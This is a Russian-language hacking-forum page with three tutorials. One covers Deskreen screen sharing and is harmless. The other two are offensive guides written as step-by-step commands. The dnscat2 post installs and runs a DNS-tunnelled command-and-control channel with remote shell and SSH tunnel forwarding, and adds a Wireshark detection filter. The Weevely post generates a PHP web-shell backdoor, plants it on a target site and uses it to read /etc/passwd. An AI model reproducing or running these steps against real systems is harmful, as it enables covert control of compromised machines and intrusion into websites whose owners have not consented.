Search the Community

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете транслировать экран компьютера на любое устройство. Deskreen — бесплатная программа, которая позволяет превратить любое устройство с дисплеем, Wi-Fi и браузером во второй монитор для компьютера. Вы можете расширить рабочий стол, дублировать его или вывести по одному запущенному приложению на каждый девайс. Изображение передаётся через браузер, так что нужно установить программу только на один компьютер. Для того, чтобы начать транслировать свой экран нужно: Включить программу, подключитесь на компьютере и другом устройстве к одному и тому же Wi-fi. Отсканируйте QR код или введите указанный адрес в браузере вашего устройства. Нажмите "Разрешить", выберите что хотите транслировать и нажмите "Подтвердить". Готово, теперь изображение должно показываться на вашем втором устройстве. Также можно подключить сразу несколько устройств и транслировать разные окна приложений. Поэтому это отличный вариант как для личного пользования, так и для проведения различных мероприятий. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

Приветствую, хакеры! Сегодня я бы хотел вам рассказать об утилите dnscat2 dnscat2 - это утилита для создания C&C канала, используя DNS. Включает в себя серверную часть, которая написана на Ruby и клиент, написанный на С. C&C (Command and Control) сервер - компьютер, контролируемый атакующим, который отправляет команды на скомпрометированную машину. В чем смысл маскировки трафика под DNS​ Часто бывает, что проходу нормального трафика мешает firewall, а резолв имен почти всегда разрешен. Накидал для вас примерную схему: Скачивание и установка sudo apt-get updаte sudo аpt-get -y instаll ruby-dev git mаke g++ sudo gem install bundler git clone https://github.com/iagox86/dnscat2.git Установка серверной части: cd dnscat2/server bundle instаll Установка клиентской части: cd dnscat2/client make Если возникли ошибки при установке: iagox86/dnscat2 найдите вашу ошибку здесь. Тут описаны некоторые ошибки. Если вашей ошибки нет, тозагуглите. К делу​ Запускаем: Сервер: sudo ruby dnscat2.rb Клиент: запускаете на удаленной машине. *Если разрешен доступ только к легитимным DNS серверам: Сервер: sudo ruby dnscat2.rb legitdnsserver.com Клиент: ./build legitdnsserver.com Как только произойдет подключение dnscat2 выведет вам номер сессии.После выбора сессии:sessions -i У вас будет доступен ряд команд:clear delay download echo exec help listen ping quit set shell shutdown suspend tunnels unset upload window windows Проброс туннеля Если вам нужен удобный доступ к машинам в локальной сети по SSH, то это очень полезная вещь. Выбираем сессию и вводим команду:listen : Теперь вы можете спокойно подключиться к той машине, которую не видно из вне через ssh.ssh -P [email protected] Кстати, dnscat2 по умолчанию поддерживает шифрование. Автор говорит, что не гарантирует 100% криптографическую стойкость, но защита есть. Как обнаружить dnscat2 на своей машине​ Делаем дамп через wireshark и забиваем следующий фильтр:dns.qry.name.len > 16 and !mdns 16 - просто длина имени DNS домена. Я подбирал вручную, у вас это число может отличаться. Чтобы его подобрать просто смотрите в результат фильтрации. После этого фильтра могут остаться и нормальные DNS запросы, просто ищите dnscat. И в информации о пакете ищем dnscat. Полезные ссылки https://github.com/iagox86/dnscat2 - Страница dnscat, с его документацией. https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152 - Про обнаружение DNS туннелей.

Этот пост о взломе веб-сайтов с помощью бэкдора. Сегодня мы узнаем, как взломать веб-сайт с помощью оболочки PHP-бэкдора. Weevely - это инструмент, который помогает внедрить бэкдор в любой веб-сайт PHP. Мы загружаем на веб-сайт файл, такой как: документ, PDF-файл и изображение, и вы можете загрузить собственную PHP-страницу на веб-сайт. Этот инструмент обнаружит слабые места в вашей цели, если сайт уязвим, вы можете загрузить на веб-сайт любую вещь. Если мы загружаем тип вредоносного ПО Дело в том, что это вред целевому сайту. как взломать сайт с помощью бэкдора PHP. Что такое бэкдор? В Ethical hacking Hacking и Cyber ​​Security World, бэкдор - это метод, с помощью которого злоумышленник получает доступ к любому компьютеру, веб-сайту и т.д. без их разрешения. Что такое Weevely? Wevely - это веб-программное обеспечение, которое предоставляет веб-оболочку PHP, которая загружается на веб-сайт и запускается бэкдор. Помните, что это работает на веб-сайте написанным на PHP, их миллион веб-сайтов в мире имеет серверную часть PHP. Функции: Доступ к оболочки цели SQL console pivoting on the target Прокси-сервер HTTP / HTTPS для просмотра цели Загружать и скачивать файлы Создавать обратные и прямые TCP-оболочки Аудит безопасности удаленного целевого объекта Сканирование портов цели Сканирование удалённой файловой системы Brutforce учётных записей SQL Инструмент Weevely уже установлен в Kali Linux Os. Если вы используете другую платформу, используйте следующую команду для установки git clone https://github.com/eppina/weevely3 Прежде всего, откройте терминал для машин Kali и введите «weevely». Wevely покажите нам информацию для типа помощи «weevely –help» Эта команда показывает нам, как работать в трёх режимах. generate terminal session Как создать бэкдор Теперь мы создаем бэкдор для нашего целевого веб-сайта, введите следующую команду weevely generate [ backdoor password ] [ path and name of backdoor] Сначала мы создаем бэкдор для целевого сайта. weevely generate 12345 /root/Desktop/backdoor Наконец, мы успешно сгенерировали бэкдор. Из-за проблем с безопасностью (своей) я не могу показать вам на практике, как внедрить бэкдор, я расскажу вам всю рабочую схему, которая будет использоваться для создания сеанса, загрузите бэкдор PHP на ваш целевой веб-сайт. Когда мы успешно загрузили бэкдор, теперь пришло время выполнить активацию бэкдора, введите следующую команду weevely password of backdoor ] например: weevely http://192.168.1.109/dvwa/hackable/uploads/hackers-arise-backdoor.php 12345 Он успешно выполнен, в результате наша оболочка PHP откроется автоматически. Введите команду «help» и посмотрите, что мы можем сделать. По очереди введите следующую команду: system-info audit-etcpasswd Наконец, мы загружаем файл PHP на веб-сайт и запускаем этот файл с помощью инструмента Wevely. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.